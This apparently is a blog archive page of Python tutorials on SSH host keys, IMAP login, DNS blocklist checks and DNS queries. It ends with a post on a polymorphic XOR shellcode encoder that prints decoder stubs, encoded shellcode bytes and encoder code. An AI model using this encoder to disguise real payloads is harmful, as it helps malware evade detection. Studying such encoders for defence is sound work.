SSH Fingerprint and Hostkey with Paramiko in Python

Following on from SSH and SFTP with Paramiko & Python, I recently had the need to obtain a remote SSH server's fingerprint and host key for verification purposes. This is achievable by setting up a socket and then applying paramiko.Transport over our established socket. First, we import the various bits and pieces we'll need:

    import socket
    import paramiko
    import hashlib
    import base64

Next, we establish a socket connection 'mySocket' to "localhost" on port 22, our dummy SSH server. We then use paramiko.Transport to gain access to paramiko's core SSH protocol operations on the socket:

    mySocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    mySocket.connect(("localhost", 22))
    myTransport = paramiko.Transport(mySocket)
    myTransport.start_client()   # run the SSH handshake; the server's host key is received here

To get the remote host key, we call myTransport.get_remote_server_key(): […]

By | November 24th, 2014|Python|0 Comments

SSH and SFTP with Paramiko & Python

Paramiko is a Python implementation of SSH with a whole range of supported features. To start, let's look at the simplest example: connecting to a remote SSH server and gathering the output of ls /etc/

    import socket
    import paramiko

    ssh = paramiko.SSHClient()
    # Accept and store the host key of any server not seen before (see the note below).
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        ssh.connect('localhost', username='testuser', password='t3st@#test123')
    except (paramiko.SSHException, socket.error):
        # SSHException covers protocol and authentication failures;
        # socket.error covers an unreachable or refusing host.
        print("Connection Failed")
        quit()

    stdin, stdout, stderr = ssh.exec_command("ls /etc/")
    for line in stdout.readlines():
        print(line.strip())
    ssh.close()

After importing paramiko, we create a new variable 'ssh' to hold our SSHClient. ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) makes the client accept and remember the host key of any server it has not seen before, without prompting. For security, this is not a good idea in production: whoever answers on the first connection is trusted from then on, so a man-in-the-middle present at that moment is accepted silently. Host keys should instead be added manually (or loaded from a known_hosts file with ssh.load_system_host_keys()), leaving the default paramiko.RejectPolicy() in place so that unknown hosts are refused. Should a host key change unexpectedly, it could indicate that the connection has been compromised and is being diverted elsewhere; for a host already present in the loaded known_hosts, paramiko raises paramiko.BadHostKeyException in that case regardless of the missing-host-key policy.

Next, we create 3 variables, stdin, stdout and stderr, giving us access to the respective streams when calling ls /etc/. Then, for each "\n"-terminated line on stdout, we print the line, stripping the trailing "\n" (as print adds one). Finally, we close the SSH connection. Let's look at another example, where we communicate with stdin. […]
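Both Paramiko posts above come down to the same check: obtain the server's host key and compare its fingerprint against a value learned out of band, rather than accepting whatever key is presented. The following is an added example, not code from either post. It uses only the standard library and a constructed ssh-ed25519 key blob (the key bytes are made up; the blob layout is the SSH wire format). It computes the two fingerprint forms OpenSSH prints and checks a presented blob against a pinned fingerprint. With paramiko, the blob to pass in is myTransport.get_remote_server_key().asbytes().

```python
import base64
import hashlib
import hmac
import struct


def _ssh_string(data: bytes) -> bytes:
    """SSH wire-format string: 4-byte big-endian length, then the bytes."""
    return struct.pack(">I", len(data)) + data


# Constructed sample: an ssh-ed25519 public key blob laid out as the SSH wire
# format expects (type string, then the 32-byte key). The key bytes are made up
# for this example; with paramiko the equivalent blob is
# transport.get_remote_server_key().asbytes().
SAMPLE_KEY_BLOB = _ssh_string(b"ssh-ed25519") + _ssh_string(bytes(range(32)))


def key_type(blob: bytes) -> str:
    """Key algorithm name carried at the front of the blob (e.g. ssh-rsa)."""
    (length,) = struct.unpack(">I", blob[:4])
    return blob[4:4 + length].decode("ascii")


def md5_fingerprint(blob: bytes) -> str:
    """Legacy form, as printed by ssh-keygen -l -E md5: colon-separated hex."""
    hexdigest = hashlib.md5(blob).hexdigest()
    return "MD5:" + ":".join(hexdigest[i:i + 2] for i in range(0, 32, 2))


def sha256_fingerprint(blob: bytes) -> str:
    """OpenSSH default form: base64 of the SHA-256 digest with padding removed."""
    digest = hashlib.sha256(blob).digest()
    return "SHA256:" + base64.b64encode(digest).decode("ascii").rstrip("=")


def fingerprint_matches(blob: bytes, pinned: str) -> bool:
    """Check a presented host key against a fingerprint pinned out of band.

    Accepts either format. The MD5 form may be given with or without its MD5:
    prefix and in either case; the SHA256 form is case-sensitive base64 and is
    compared as given. The comparison is constant-time."""
    if pinned.startswith("SHA256:"):
        return hmac.compare_digest(sha256_fingerprint(blob), pinned)
    expected = pinned.lower()
    if expected.startswith("md5:"):
        expected = expected[4:]
    return hmac.compare_digest(md5_fingerprint(blob)[4:], expected)


SAMPLE_SHA256 = sha256_fingerprint(SAMPLE_KEY_BLOB)
SAMPLE_MD5 = md5_fingerprint(SAMPLE_KEY_BLOB)
# Same blob with the last key byte flipped: what a substituted host key looks like.
TAMPERED_BLOB = SAMPLE_KEY_BLOB[:-1] + bytes([SAMPLE_KEY_BLOB[-1] ^ 0x01])
```

In the Transport-based flow from the first post, call fingerprint_matches(myTransport.get_remote_server_key().asbytes(), pinned) immediately after start_client() and close the transport without authenticating if it returns False; paramiko's own PKey.get_fingerprint() returns the raw MD5 digest bytes, which is what md5_fingerprint formats. In the SSHClient flow, the equivalent is to drop AutoAddPolicy, load known_hosts and let RejectPolicy refuse anything unpinned.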

By | November 23rd, 2014|Python|6 Comments

Simple IMAP Account Verification in Python

imaplib is a great library for handling IMAP communication. It supports both plaintext IMAP and IMAP over SSL (IMAPS) with ease. Connecting to an IMAP server is achieved as follows:

    import imaplib
    import socket

    host = ""
    port = 143       # 143 for plaintext IMAP; use 993 when ssl is set
    ssl = 0

    try:
        if ssl:
            imap = imaplib.IMAP4_SSL(host, port)
        else:
            imap = imaplib.IMAP4(host, port)
        welcomeMsg = imap.welcome
        print("IMAP Banner: %s" % (welcomeMsg))
    except (imaplib.IMAP4.error, socket.error):
        # socket.error covers an unreachable or refusing host;
        # IMAP4.error covers a malformed or non-OK greeting.
        print("Connection Failed")
        quit()

This results in the following output:

    IMAP Banner: * OK [CAPABILITY IMAP4rev1 UIDPLUS CHILDREN NAMESPACE THREAD=ORDEREDSUBJECT THREAD=REFERENCES SORT QUOTA IDLE ACL ACL2=UNION STARTTLS] Courier-IMAP ready. Copyright 1998-2011 Double Precision, Inc. See COPYING for distribution information.

Note the STARTTLS capability in the banner. On a plaintext port 143 connection such as this one, the LOGIN below sends the password in the clear unless imap.starttls() (Python 3.2+) is called first, or IMAPS on port 993 is used instead. Now, to log in:

    username = ""
    password = "password"

    try:
        loginMsg = imap.login(username, password)
        print("Login Message: %s" % (loginMsg[1]))
    except imaplib.IMAP4.error:
        print("Login Failed")
        quit()

With acceptable credentials, the response is:

    Login Message: ['LOGIN Ok.']

Lastly, to print a list of all mailboxes in the account:

    try:
        mBoxes = imap.list()
        for mBox in mBoxes[1]:
            print(mBox)
    except imaplib.IMAP4.error:
        print("Couldn't get Mail Boxes")
        quit()

[…]
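The banner quoted above already tells the client whether the login can be protected. As an added example (not code from the post), the following parses the CAPABILITY list out of a greeting, decides whether LOGIN may proceed, and wraps imaplib so that credentials are never sent over an unprotected connection. SAMPLE_BANNER is the greeting from the post, embedded as bytes as imaplib delivers it; connect_securely performs real network I/O and is not exercised by the offline checks, and its hostname/port arguments are the caller's.

```python
import imaplib
import re
import ssl
from typing import Set

# The greeting quoted in the post, as imaplib exposes it in imap.welcome (bytes).
SAMPLE_BANNER = (
    b"* OK [CAPABILITY IMAP4rev1 UIDPLUS CHILDREN NAMESPACE THREAD=ORDEREDSUBJECT "
    b"THREAD=REFERENCES SORT QUOTA IDLE ACL ACL2=UNION STARTTLS] Courier-IMAP ready. "
    b"Copyright 1998-2011 Double Precision, Inc. See COPYING for distribution information."
)

# RFC 3501 lets a server put its capability list inside the OK response code
# of the greeting, which is what Courier does here.
_CAPS_RE = re.compile(rb"\[CAPABILITY ([^\]]*)\]")


def parse_capabilities(greeting: bytes) -> Set[str]:
    """Capability tokens advertised in a greeting, upper-cased; empty if none.

    imaplib exposes the same information as imap.capabilities (it issues a
    CAPABILITY command itself when the greeting lacks the list)."""
    match = _CAPS_RE.search(greeting)
    if not match:
        return set()
    return {tok.decode("ascii", "replace").upper() for tok in match.group(1).split()}


def login_plan(caps: Set[str], port: int) -> str:
    """How credentials may be sent on this connection:
       'tls'      - implicit-TLS port (993): the session is already encrypted
       'starttls' - plaintext port, but STARTTLS is offered: upgrade before LOGIN
       'refuse'   - no TLS available: never send the password in the clear"""
    if port == 993:
        return "tls"
    if "STARTTLS" in caps:
        return "starttls"
    return "refuse"


def connect_securely(host: str, port: int = 143) -> imaplib.IMAP4:
    """Open an IMAP session, refusing to continue unless TLS protects the login.

    Network code: the caller supplies host and port. The default SSL context
    verifies the server certificate and hostname."""
    ctx = ssl.create_default_context()
    if port == 993:
        return imaplib.IMAP4_SSL(host, port, ssl_context=ctx)
    imap = imaplib.IMAP4(host, port)
    plan = login_plan(set(imap.capabilities), port)
    if plan != "starttls":
        imap.shutdown()
        raise RuntimeError("%s:%d offers no TLS; refusing plaintext login" % (host, port))
    imap.starttls(ssl_context=ctx)
    # imaplib re-reads capabilities after STARTTLS; LOGINDISABLED should be gone now.
    if "LOGINDISABLED" in imap.capabilities:
        imap.shutdown()
        raise RuntimeError("server still refuses LOGIN after STARTTLS")
    return imap
```

After connect_securely returns, the post's imap.login(username, password) and imap.list() calls work unchanged; the difference is only that the LOGIN command now travels inside TLS.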

By | November 22nd, 2014|Python|0 Comments

DNS Black List / RBL Checking in Python

Following on from performing basic DNS lookups in Python, it's relatively trivial to begin testing DNS Block Lists (DNSBLs), also known as Real-time Blackhole Lists (RBLs), for blocked mail server IP addresses. To assist in preventing spam, a number of public and private RBLs are available. These track the IP addresses of mail servers that are known to produce spam, allowing recipient mail servers to deny delivery from known spammers.

RBLs operate over DNS. To test an RBL, a DNS query is made. As an example, take a popular RBL. To test an IP address against the blocklist, I reverse the octets of the IP address, append the list's zone, and then perform an 'A' record lookup on the resulting host name:

    root@w:~/tmp# host -t a
    Host not found: 3(NXDOMAIN)

Excellent. The IP was not found in the list, so NXDOMAIN is returned. Now, to take a known spammer's IP: […]
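Putting the reversal and lookup into code, as an added example that is not the post's own script: rbl.example is a hypothetical zone, the answers in SAMPLE_ANSWERS are constructed so the logic can run offline, and the default resolver uses the standard library's socket module instead of dnspython. The interpretation of answers follows the DNSBL convention that a listing is returned as an address in 127.0.0.0/8 (with 127.0.0.2 conventionally listed for testing) and that NXDOMAIN means not listed.

```python
import ipaddress
import socket
from typing import Callable, Dict, List


def rbl_query_name(ip: str, zone: str) -> str:
    """Build the DNSBL query name: the IPv4 octets reversed, then the list's zone.

    Only IPv4 is handled; IPv6 lists use a reversed-nibble form not covered here.
    Invalid addresses raise ValueError rather than producing a bogus query."""
    addr = ipaddress.ip_address(ip)
    if addr.version != 4:
        raise ValueError("only IPv4 addresses are supported: %s" % ip)
    return ".".join(reversed(str(addr).split("."))) + "." + zone.strip(".")


def resolve_a(name: str) -> List[str]:
    """Default resolver: the A records for `name`, or [] when the lookup fails
    (NXDOMAIN surfaces as socket.gaierror). Standard library only; with
    dnspython, dns.resolver.resolve(name, "A") and dns.resolver.NXDOMAIN do
    the same job."""
    try:
        return socket.gethostbyname_ex(name)[2]
    except socket.gaierror:
        return []


def check_rbl(ip: str, zone: str,
              resolve: Callable[[str], List[str]] = resolve_a) -> Dict:
    """Test one address against one list.

    A listing answers with addresses in 127.0.0.0/8, the final octets being the
    list's own return codes; NXDOMAIN means not listed. Answers outside 127/8
    are not listings (typical of a retired list that now wildcards everything,
    or of a resolver that rewrites NXDOMAIN) and are reported separately rather
    than treated as a hit, which would otherwise block all mail."""
    name = rbl_query_name(ip, zone)
    answers = resolve(name)
    codes = [a for a in answers if a.startswith("127.")]
    unexpected = [a for a in answers if not a.startswith("127.")]
    return {"query": name, "listed": bool(codes),
            "codes": sorted(codes), "unexpected": unexpected}


# Constructed answers standing in for the DNS, keyed by query name, under the
# hypothetical zone rbl.example: the conventional test address 127.0.0.2 is
# listed, and 192.0.2.3 gets a non-127/8 answer of the kind a wildcarded or
# hijacked zone returns.
SAMPLE_ANSWERS = {
    "2.0.0.127.rbl.example": ["127.0.0.2"],
    "3.2.0.192.rbl.example": ["198.51.100.7"],
}


def sample_resolve(name: str) -> List[str]:
    """Offline stand-in for resolve_a: unknown names behave like NXDOMAIN."""
    return SAMPLE_ANSWERS.get(name, [])
```

Against a live list, call check_rbl(ip, zone) with the default resolver; the "codes" entry carries the list's return codes, whose meaning is specific to each operator and should be looked up in that list's documentation before acting on it.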

By | November 22nd, 2014|Python|2 Comments

Performing DNS Queries in Python

dnspython provides a detailed interface into DNS. In its simplest form, it's possible to perform queries in only a couple of lines of code. Here's a commented example:

    import dns.resolver                       # import the module
    myResolver = dns.resolver.Resolver()      # create a new resolver instance named 'myResolver'
    myAnswers = myResolver.query("", "A")     # look up the 'A' record(s) for the given name
    for rdata in myAnswers:                   # for each response
        print(rdata)                          # print the data

(In dnspython 2.x, Resolver.query() is deprecated in favour of Resolver.resolve(), which takes the same arguments here.) The results in my case are: […]

By | November 21st, 2014|Development, Python|3 Comments

Python Cascading XOR Polymorphic Shellcode Generator

I've been working on a simple Python utility to encode and wrap existing shellcode. The last byte of the shellcode is XOR'd with a random seed byte, and then, working backwards, each byte is XOR'd with the (already encoded) byte after it, so the decoder recovers each byte by XORing it with its successor. The stub itself is vaguely polymorphic: it is very small, but on each run it will reorder instructions where possible, use different registers, and add some random NOP sequences. The encoder supports shellcode with or without null bytes, and also supports a list of 'bad characters' that are not allowed to appear in the finished result wherever possible. That part isn't foolproof, and certain characters such as '\xeb' (the opcode of the stub's short jmp) are unavoidable. This could be improved a lot, however. I also know the Python code isn't great, but it is functional. As you'll see from looking through the code, I never got round to learning about Python data types, and so there's a lot of hackery and kludgery. In any case, the purpose was just to develop a basic functional PoC from scratch.

If the entered shellcode contains nulls, we use a slightly different version of the decoder stub, since 0x00 cannot serve as the terminator. In that case our basic stub is:

    _start:
        jmp short getpc
    start_decoder:
        pop edi
    decoder:
        inc edi
        mov bl, [edi]
        xor [edi-1], bl
        cmp byte [edi+1], 0xXX
        jnz decoder
        jmp short shellcode
    getpc:
        call start_decoder
    shellcode:
        db 0xf0,0x19,0x0c,0x0c,0x0c,0x0c,0x55,0x64,0xa4,0x95,0x4e,0x7f,0xad,0x1d,0x19,0xaa,0xab,0x19,0x14,0xd9,0x59,0xe9,0xe8,0x5b,0x5a,0x97,0x17,0xff,0x19,0xe6,0x19,0xe6,0xae,0xcb,0xa7,0xcb,0xa4,0x84,0xd3,0xbc,0xce,0xa2,0xc6,0xe7,0xed,0xXX

There will be various transforms made to this code; however, the main point to note is that we 'cmp' the byte with our random stop byte (0xXX), and you'll see that tagged on to the end of the shellcode as well.

If we have no nulls, then \x00 is going to be our terminator after the last character, and so we can shorten the stub slightly:

    global _start
    section prog write exec
    _start:
        jmp short getpc
    start_decoder:
        pop ebp
    decoder:
        mov dl, [ebp+1]
        inc ebp
        xor [ebp-1], dl
        jne decoder
        jmp short shellcode
    getpc:
        call start_decoder
    shellcode:
        db 0x64,0x55,0x8e,0x79,0x9a,0x2a,0x4c,0x1f,0xe1,0x22,0x71,0x1b,0x19,0x90,0x71,0xbc,0x3c,0xb5,0x72,0x18,0x7e,0x26,0x7d,0x23,0x45,0x2d,0x20,0xd0,0xb6,0xe5,0x6c,0x8d,0xe7,0xf7,0xa6,0xf1,0x78,0x99,0x54,0xd4,0xbe,0xd8,0x80,0x81,0x5a,0x30,0x31,0x66,0xef,0x0e,0xc3,0x43,0x29,0x4f,0x17,0x54,0x65,0xb7,0xe5,0xb7,0xe0,0x69,0x88,0x45,0xc5,0x56,0x67,0xae,0x1f,0x1d,0xad,0x92,0x5f,0xdf,0x96,0xef,0x16,0x27,0xe7,0xb7,0xdf,0xf0,0xdf,0xac,0xc4,0xac,0x83,0xe1,0x88,0xe6,0x6f,0x8c,0xdc,0x55,0xb7,0xe4,0x6d,0x8c,0x3c,0x37,0xfa,0x7a,0x7a

In this case, we have the stop byte twice, 0x7a,0x7a, which XOR to 0x00, so the 'jne decoder' falls through and execution continues into the shellcode. The NOP generator function is commented out; however, this can be expanded as needed to pad out the shellcode. Here's the full encoder: […]
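The encoder half of the stop-byte scheme, as an added example written for this page: it is not the post's encoder (whose output is randomised) but is derived from what the decoder stub above does, with the bad-character and stop-byte collision checks the post describes. SAMPLE is a constructed byte string standing in for shellcode and is not real shellcode; BAD_CHARS is a hypothetical bad-character list; the deterministic stop-byte search starting at 0x7a is a choice made here so the output is reproducible.

```python
from typing import Iterable, Optional, Tuple

# Constructed sample payload (not real shellcode); it deliberately contains
# 0x00 bytes so the stop-byte variant of the stub is the one exercised.
SAMPLE = bytes([0x31, 0xc0, 0x00, 0x00, 0x50, 0x68, 0x2f, 0x2f, 0x73, 0x68, 0x00, 0xcd, 0x80])
BAD_CHARS = frozenset({0x00, 0x0a, 0x0d})   # hypothetical bad-character list


def encode_with_stop(plain: bytes, stop: int, bad: frozenset) -> Optional[bytes]:
    """Cascade-XOR `plain` using `stop` as the trailing seed byte.

    Working backwards from the stop byte, each output byte is the plaintext
    byte XORed with the already-encoded byte after it, so the stub recovers
    p[i] = e[i] ^ e[i+1]. Returns None if the result is unusable: the stop
    byte may occur nowhere but the end (the stub's cmp would otherwise exit
    early), and no output byte may be a bad character."""
    if stop in bad:
        return None
    out = bytearray(len(plain) + 1)
    out[-1] = stop
    for i in range(len(plain) - 1, -1, -1):
        out[i] = plain[i] ^ out[i + 1]
        if out[i] == stop or out[i] in bad:
            return None
    return bytes(out)


def cascade_encode(plain: bytes, bad: Iterable[int] = BAD_CHARS,
                   first: int = 0x7a) -> Tuple[bytes, int]:
    """Find a stop byte that works, trying candidates from `first` onward.

    The post's tool picks the seed at random; the deterministic search here
    makes the output reproducible. Returns (encoded, stop), or raises
    ValueError if no stop byte satisfies the constraints for this payload."""
    bad = frozenset(bad)
    for k in range(256):
        stop = (first + k) & 0xff
        out = encode_with_stop(plain, stop, bad)
        if out is not None:
            return out, stop
    raise ValueError("no stop byte avoids the bad characters for this payload")


def can_encode(plain: bytes, bad: Iterable[int] = BAD_CHARS) -> bool:
    """True if some stop byte yields a usable encoding of `plain`."""
    try:
        cascade_encode(plain, bad)
        return True
    except ValueError:
        return False


def cascade_decode(encoded: bytes, stop: int) -> bytes:
    """Mirror of the stub's loop: XOR byte i with byte i+1, advance, and stop
    once the byte just consumed is the stop marker. Returns the plaintext."""
    buf = bytearray(encoded)
    i = 0
    while i + 1 < len(buf):
        buf[i] ^= buf[i + 1]
        i += 1
        if buf[i] == stop:
            break
    return bytes(buf[:i])


def nasm_db(encoded: bytes) -> str:
    """Render the encoded bytes as the `db` line that follows the stub."""
    return "db " + ",".join("0x%02x" % b for b in encoded)


def roundtrip_demo() -> int:
    """Encode SAMPLE, check the constraints, decode; returns the stop byte chosen."""
    encoded, stop = cascade_encode(SAMPLE)
    assert len(encoded) == len(SAMPLE) + 1
    assert not (set(encoded) & BAD_CHARS)
    assert cascade_decode(encoded, stop) == SAMPLE
    return stop


if __name__ == "__main__":
    enc, chosen = cascade_encode(SAMPLE)
    print("stop byte 0x%02x" % chosen)
    print(nasm_db(enc))
```

One limit of a single trailing marker falls out of the arithmetic: if the payload's last byte is 0x00, the byte before the marker encodes to 0x00 ^ stop, which is the marker itself, so the stub would exit one byte early whatever seed is chosen; can_encode reports this rather than emitting a stub that fails. This is one instance of the "isn't foolproof" class the post mentions, alongside the unavoidable 0xeb.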

By | April 11th, 2013|Linux, Python, Shellcode|0 Comments